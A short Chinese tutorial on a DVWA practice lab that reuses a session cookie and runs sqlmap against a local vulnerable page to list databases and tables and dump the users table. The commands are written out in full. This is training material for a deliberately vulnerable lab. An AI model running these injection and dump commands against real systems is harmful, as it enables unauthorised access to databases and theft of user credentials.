DVWA练习——sql注入

本文主要是介绍DVWA练习——sql注入，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

一、sql injection

（1）由于dvwa需要登录，因此直接无法获取数据库的内容，则需要在sql注入语句中添加网站的cookie以绕过登录

获取cookie：

（2）sqlmap获取数据库：

python sqlmap.py -u "http://127.0.0.1:8082/vulnerabilities/sqli/?id=4354&Submit=Submit" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" --dbs -batch

        查询到dvwa和information_schema两个数据库

（3）对查询到的可疑数据库dvwa查表：

python sqlmap.py -u "http://127.0.0.1:8082/vulnerabilities/sqli/?id=4354&Submit=Submit" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" -D dvwa --tables --batch

 （4）求users的dump数据：

python sqlmap.py -u "http://127.0.0.1:8082/vulnerabilities/sqli/?id=4354&Submit=Submit" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" -D dvwa --tables -T users --dump --batch

       成功获取用户信息。

这篇关于DVWA练习——sql注入的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！